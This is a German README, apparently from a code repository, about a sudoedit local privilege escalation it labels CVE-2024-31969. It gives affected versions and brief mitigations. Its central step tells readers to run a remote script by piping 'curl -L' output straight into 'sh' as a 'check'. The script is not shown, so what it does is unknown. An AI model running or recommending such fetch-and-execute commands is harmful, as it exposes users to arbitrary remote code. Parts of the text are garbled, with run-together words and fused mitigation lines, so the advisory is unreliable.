
Stellt ein Proof-of-Concept-Prüfskript und Dokumentation für CVE-2024-31969 bereit, eine lokale Rechteausweitung in sudos sudoedit, einschließlich betroffener Versionen und Hinweisen zur Abschwächung.
CVE-2024-31969 ist eine lokale Privilegienausweitung (Local Privilege Escalation) in sudo bei Verwendung des Befehls sudoedit.
Diese Schwachstelle wurde seit sudo 1.9.0 eingeführt, da sudoedit die Umgebungsvariablen des Benutzers und die Dateiberechtigungen nicht ausreichend validiert.
Ein Fehler, der in sudo 1.9.0 eingeführt wurde, betrifft die Art und Weise, wie
sudoeditdie Umgebungsvariablen und Dateiberechtigungen der Benutzer validierte.
Diese Schwachstelle ermöglicht es einem lokalen Benutzer mit sudoedit-Zugriff, beliebige Dateien als Root zu modifizieren, indem er Umgebungsvariablen wie SUDO_EDITOR manipuliert oder Symlinks ausnutzt.
| Sudo-Version | Status |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Anfällig |
| 1.9.15p5 und höher | ✅ Sicher |
| 1.8.x (einschließlich 1.8.23) | ❌ Nicht betroffen |
Führen Sie den folgenden Befehl aus:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo auf Version 1.9.15p5 oder neuer.sudoers-Regeln, die sudoedit für Nicht-Root-Benutzer erlauben.env_keep- oder env_reset-Konfiguration in der Datei /etc/sudoers.Dieses Repository wurde zu Bildungszwecken und für die Dokumentation der Systemsicherheit erstellt.
Es ist strengstens untersagt, diese Informationen für illegale Aktivitäten oder ohne schriftliche Genehmigung des Systemeigentümers zu verwenden.
Jeglicher Missbrauch liegt vollständig außerhalb der Verantwortung des Erstellers.